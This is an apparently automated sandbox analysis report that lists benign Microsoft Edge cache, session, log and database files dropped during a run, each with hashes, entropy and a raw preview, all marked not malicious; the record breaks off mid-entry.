                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):114694
                                                                                                                                                                                                                                                                Entropy (8bit):5.577958299607159
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/rmL/rBZXECjPXNtSsNFS7LREqpC:B9LyxPXfOxr1lMe1nL/CL/TXE6t07t4
                                                                                                                                                                                                                                                                MD5:420CD86FBAEC219735C9B219F22BF1A9
                                                                                                                                                                                                                                                                SHA1:FA11B7D24036E171CABBBF168A3AA7A4534E708A
                                                                                                                                                                                                                                                                SHA-256:9314D9508EB767E4B8BB57F68AA5DB67BA22D4D7B20DEF1BF17FD2A57FD087A2
                                                                                                                                                                                                                                                                SHA-512:6D8477CE69DB8B7BBFA44498BF28F14A3BB55059331C02BFEB7315A21D5414FBF9238DCB926B9A0E2A47EC4B9C461CF654E68D23E851F90C003FD444B7A2FD7E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):189185
                                                                                                                                                                                                                                                                Entropy (8bit):6.386372830799687
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:HvFL0y8VmwbrVMHRwL/ZKdOfekWQ66mi1clvW:amwNMHuL/AIhWfre
                                                                                                                                                                                                                                                                MD5:5CC5965437CAE4A1D417B920C7F77D3C
                                                                                                                                                                                                                                                                SHA1:8E3ADFE87679BB6FFAEF4A8C3954327921D4C907
                                                                                                                                                                                                                                                                SHA-256:BAA925553532356E2DA8D9AA382BBFD23A341DE866E6F376FC217167CAAA330F
                                                                                                                                                                                                                                                                SHA-512:79E27A50CF6EBD80A94A0DCE72A6BA320D30F3B8794584C9F1444C0261793B446506F02BB26AB9639389F2A62089F543DC347CFDEB945647E5EFDF94F4DDA769
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0....z3.................;.....x..........,T.8..`,.....L`.....,T...`......L`......Rc.)......exports...Rc>..;....module....RcVD......define....Rb.\......amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H......q.Q.m.....b...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true..a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....[...,T.`.`z.....L`..........a............a.........Dr8................/....-.......}....4..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:0\r..m..................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:dl0HFQyXl/lYV/lxE0tllQQXgKl:0SKYW0+QXgKl
                                                                                                                                                                                                                                                                MD5:34A65476E6B26557E7B33DAF5E386A3C
                                                                                                                                                                                                                                                                SHA1:D9536B970B5A00CCFE1B86D8AF8DF801D14CA316
                                                                                                                                                                                                                                                                SHA-256:ED3E759165299AC7846D82AB0CAE08F431ECB13E61FA73A1F4D1D81FC94E775D
                                                                                                                                                                                                                                                                SHA-512:DDD14B6BACD58DCA4E5EA87184200CE519B1EC099834220118C86FE1C47872D50CFEA8993DA1319760F337E3A0B9CD8588A75FCFADDC534ACCD7BDE00FB74681
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:@...h. koy retne.........................X....,.................|..../.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:dl0HFQyXl/lYV/lxE0tllQQXgKl:0SKYW0+QXgKl
                                                                                                                                                                                                                                                                MD5:34A65476E6B26557E7B33DAF5E386A3C
                                                                                                                                                                                                                                                                SHA1:D9536B970B5A00CCFE1B86D8AF8DF801D14CA316
                                                                                                                                                                                                                                                                SHA-256:ED3E759165299AC7846D82AB0CAE08F431ECB13E61FA73A1F4D1D81FC94E775D
                                                                                                                                                                                                                                                                SHA-512:DDD14B6BACD58DCA4E5EA87184200CE519B1EC099834220118C86FE1C47872D50CFEA8993DA1319760F337E3A0B9CD8588A75FCFADDC534ACCD7BDE00FB74681
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:@...h. koy retne.........................X....,.................|..../.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3e33d.TMP (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):72
                                                                                                                                                                                                                                                                Entropy (8bit):3.565412423760729
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:dl0HFQyXl/lYV/lxE0tllQQXgKl:0SKYW0+QXgKl
                                                                                                                                                                                                                                                                MD5:34A65476E6B26557E7B33DAF5E386A3C
                                                                                                                                                                                                                                                                SHA1:D9536B970B5A00CCFE1B86D8AF8DF801D14CA316
                                                                                                                                                                                                                                                                SHA-256:ED3E759165299AC7846D82AB0CAE08F431ECB13E61FA73A1F4D1D81FC94E775D
                                                                                                                                                                                                                                                                SHA-512:DDD14B6BACD58DCA4E5EA87184200CE519B1EC099834220118C86FE1C47872D50CFEA8993DA1319760F337E3A0B9CD8588A75FCFADDC534ACCD7BDE00FB74681
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:@...h. koy retne.........................X....,.................|..../.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6599
                                                                                                                                                                                                                                                                Entropy (8bit):3.38062221292264
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:eYsi/Cbp6r4SaavjfMfXRP7h9Xp+qDiW5SLl9iSreX2XDB:eW/Cbp6Wdh9Xp+oT5SLl9iSru29
                                                                                                                                                                                                                                                                MD5:B9FB218D256C08731298D744B17F3527
                                                                                                                                                                                                                                                                SHA1:E483ABC26F8A34C5A7C2DABB84992BDA1B2A9F8F
                                                                                                                                                                                                                                                                SHA-256:8FA7657D462934D16A964FBDE63AEBB8DBA7CC546CF6EC43A0B68C0F73EAD492
                                                                                                                                                                                                                                                                SHA-512:29BDC1707D3C842735C768DEE0CBE960E38FFBFDFCFC6EA11D88FFA9E1F404BD8F1316D701338941F9528ACA7F2A542CEFAD41DADCE86AD55556B229EBE346BB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................zb................next-map-id.1.Cnamespace-0f8575b3_2ee1_46ea_a935_3b3d51ceb898-https://ntp.msn.com/.0V.e................V.e................V.e................V.e................@\9S.................map-0-shd_sweeper.0{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.e.h.p.s.b.h.v.c.,.a.d.s.-.m.n.-.m.i.g.r.,.p.r.g.-.p.o.l.i.s.h.e.d.-.s.t.y.l.e.s.,.p.r.g.-.1.s.-.d.w.v.i.d.-.t.1.,.1.s.-.p.1.-.d.w.l.s.,.1.s.-.p.2.-.d.w.l.s.,.p.r.g.-.1.s.w.-.n.o.c.o.o.l.d.o.w.n.,.p.r.g.-.p.r.1.-.v.i.d.e.o.s.,.p.r.g.-.p.r.2.-.v.i.d.e.o.s.,.p.r.g.-.v.i.d.-.d.w.l.s.c.a.c.h.e.,.p.r.g.-.1.s.w.-.s.a.-.s.p.6.-.t.1.f.,.p.r.g.-.1.s.w.-.s.a.l.3.f.c.t.b.1.,.p.r.g.-.1.s.w.-.c.-.c.h.a.n.g.e.s.i.z.e.,.p.r.g.-.1.s.w.-.n.o.r.e.t.r.y.,.p.r.g.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):321
                                                                                                                                                                                                                                                                Entropy (8bit):5.176885219863171
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7A1dzlyq2PCHhJ23oH+TcwtrQMxIFUt8OA1Ca1Zmw+OA1o1RkwOCHhJ23oH+TcwJ:7Y1lyvBYebCFUt8OYF/+OYSR56YebtJ
                                                                                                                                                                                                                                                                MD5:D395BFFB63775A77572162E7DE783E9E
                                                                                                                                                                                                                                                                SHA1:3CE544B0F52A4101686E89FE277F9FB27DDC4240
                                                                                                                                                                                                                                                                SHA-256:545B98A87AA3197D63533CCEDCC010A0D78BFB61285663049D11EFC37FE1F753
                                                                                                                                                                                                                                                                SHA-512:B6156196EEA237A95A9AD46799B7E2D65BDAF65A4239A4CB4C2BC1A7D11DC47D5E1F8E6ABE87766CA2C53763E1CEB01994D899FB105D80794A8419B19A090ECD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.389 fe0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/16-07:47:10.390 fe0 Recovering log #3.2024/12/16-07:47:10.393 fe0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):321
                                                                                                                                                                                                                                                                Entropy (8bit):5.176885219863171
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7A1dzlyq2PCHhJ23oH+TcwtrQMxIFUt8OA1Ca1Zmw+OA1o1RkwOCHhJ23oH+TcwJ:7Y1lyvBYebCFUt8OYF/+OYSR56YebtJ
                                                                                                                                                                                                                                                                MD5:D395BFFB63775A77572162E7DE783E9E
                                                                                                                                                                                                                                                                SHA1:3CE544B0F52A4101686E89FE277F9FB27DDC4240
                                                                                                                                                                                                                                                                SHA-256:545B98A87AA3197D63533CCEDCC010A0D78BFB61285663049D11EFC37FE1F753
                                                                                                                                                                                                                                                                SHA-512:B6156196EEA237A95A9AD46799B7E2D65BDAF65A4239A4CB4C2BC1A7D11DC47D5E1F8E6ABE87766CA2C53763E1CEB01994D899FB105D80794A8419B19A090ECD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.389 fe0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/16-07:47:10.390 fe0 Recovering log #3.2024/12/16-07:47:10.393 fe0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13378826832012205

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1443
                                                                                                                                                                                                                                                                Entropy (8bit):3.8190063404350902
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:3Z8s8WpocqBdLpsAF4unxdmH9tLp3X2amEtG1Chqrbi9rAJcZGgQKkOAM4Qz:3msqcSdLzFtwXLp2FEkChQbIASZGxHOp
                                                                                                                                                                                                                                                                MD5:9E44A9D3B9A250D3CF46659C19DCE857
                                                                                                                                                                                                                                                                SHA1:F7893397964CA19641397CE60B45A8121CC3A984
                                                                                                                                                                                                                                                                SHA-256:A091546414E1BCFE175CADF15F54BA67EFC0D1ABCB7F096248A41079ADC26CF6
                                                                                                                                                                                                                                                                SHA-512:D0319C9489797A5BDA785045209C10FB472A7693DD92D0D98EDFF312960533C6B9E96B7F0531511039819609B33AF30B38A5DAA77FEF1245B4A5B471B4C52219
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SNSS.........V9.............V9......"..V9.............V9.........V9.........V9.........V9....!....V9.................................V9..V91..,.....V9$...0f8575b3_2ee1_46ea_a935_3b3d51ceb898.....V9.........V9....8=...........V9.....V9.........................V9....................5..0.....V9&...{890D5FC3-0C4C-4214-A93A-B8E730A022A1}.......V9.........V9............................V9.............V9........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........c.b)...c.b).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                                Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):349
                                                                                                                                                                                                                                                                Entropy (8bit):5.197131648665825
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7Agt+q2PCHhJ23oH+Tcwt7Uh2ghZIFUt8OAHJZmw+OAH9VkwOCHhJ23oH+Tcwt7w:70vBYebIhHh2FUt8OQ/+OY56YebIhHLJ
                                                                                                                                                                                                                                                                MD5:80344E87132500F555D5EC7D124FE7AE
                                                                                                                                                                                                                                                                SHA1:7049B8FBBA358B483D002715014D8149489520CA
                                                                                                                                                                                                                                                                SHA-256:ED485CD391E80CC706D512B8522AF6F984E1B9869C334117DD5D8B3B621E91F0
                                                                                                                                                                                                                                                                SHA-512:A846257595205D8B1A0B563CBEDC729E2F0256A2DBFFDCB0EDF35625F12EB04AB0F8B9E26C91E0AAD1256EE112F149B9F8CF87E86DE9F1EC657F31B09CC74508
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.492 b18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/16-07:47:09.493 b18 Recovering log #3.2024/12/16-07:47:09.493 b18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):349
                                                                                                                                                                                                                                                                Entropy (8bit):5.197131648665825
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:7Agt+q2PCHhJ23oH+Tcwt7Uh2ghZIFUt8OAHJZmw+OAH9VkwOCHhJ23oH+Tcwt7w:70vBYebIhHh2FUt8OQ/+OY56YebIhHLJ
                                                                                                                                                                                                                                                                MD5:80344E87132500F555D5EC7D124FE7AE
                                                                                                                                                                                                                                                                SHA1:7049B8FBBA358B483D002715014D8149489520CA
                                                                                                                                                                                                                                                                SHA-256:ED485CD391E80CC706D512B8522AF6F984E1B9869C334117DD5D8B3B621E91F0
                                                                                                                                                                                                                                                                SHA-512:A846257595205D8B1A0B563CBEDC729E2F0256A2DBFFDCB0EDF35625F12EB04AB0F8B9E26C91E0AAD1256EE112F149B9F8CF87E86DE9F1EC657F31B09CC74508
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:09.492 b18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/16-07:47:09.493 b18 Recovering log #3.2024/12/16-07:47:09.493 b18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):431
                                                                                                                                                                                                                                                                Entropy (8bit):5.251824253194198
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:7YVQ+vBYebvqBQFUt8OYMdW/+ObQV56YebvqBvJ:7YV5BYebvZg8OYMwbS6Yebvk
                                                                                                                                                                                                                                                                MD5:EB336B12549305DB7C66F8A37630BEFC
                                                                                                                                                                                                                                                                SHA1:332572E1BAB4731A949E86BFB6075A0DB69C3EF0
                                                                                                                                                                                                                                                                SHA-256:8BD0E7EEE7D87768EF928796492C5E09C4A79C0A5B32D664BF1D58C398EC39B2
                                                                                                                                                                                                                                                                SHA-512:03873B7817F477A080DB845137769795B5E72E5AF37FE9E87B111056DA892563870C6E8B801055F0690B314BECD473B84E323AFF04B0707727BA5D05BA19847C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:2024/12/16-07:47:10.397 33c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/16-07:47:10.398 33c Recovering log #3.2024/12/16-07:47:10.402 33c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):431
                                                                                                                                                                                                                                                                Entropy (8bit):5.251824253194198
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:7YVQ+vBYebvqBQFUt8OYMdW/+ObQV56YebvqBvJ:7YV5BYebvZg8OYMwbS6Yebvk
                                                                                                                                                                                                                                                                MD5:EB336B12549305DB7C66F8A37630BEFC
